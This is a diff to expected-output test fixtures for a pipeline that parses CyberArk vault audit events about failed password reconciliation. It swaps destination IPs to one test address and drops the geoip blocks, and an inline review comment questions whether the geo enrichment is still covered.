@@ -486,19 +444,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -518,7 +465,7 @@ }, "@timestamp": "2021-03-15T10:12:18.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -530,28 +477,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T10:12:18Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\n 
\u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "4", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", 
"policy_id": "WinDomain", @@ -562,9 +509,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615803137", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -578,8 +525,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176783200Z", - "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403089800Z", + "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -607,17 +554,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", 
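Review bot: The new expected output at `@@ -607,17 +554,8 @@` drops the whole `destination.geo` object together with the IP swap, leaving only `"address": "67.43.156.15"` and `"ip": "67.43.156.15"`; the same happens at `@@ -725,19 +663,8 @@`. If the reason for moving to this address range is to keep geoip enrichment deterministic under the bundled test database, the absence of any `geo` block suggests the enrichment no longer fires for these events rather than that it was regenerated against a known fixture, and the expected file would then stop asserting that the pipeline's geoip step produces anything. I would regenerate against the test GeoIP database and, if a geo record is in fact expected for 67.43.156.15, keep the `geo` block with the fixture values so the enrichment stays covered. Separately, the two previously distinct hosts (34.66.114.180 and 34.123.103.115) now both map to 67.43.156.15, so the fixtures no longer distinguish the two accounts by address. The enclosing event object opens and closes outside this hunk.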
@@ -637,7 +575,7 @@ }, "@timestamp": "2021-03-15T10:12:19.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -649,28 +587,28 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T10:12:19Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", 
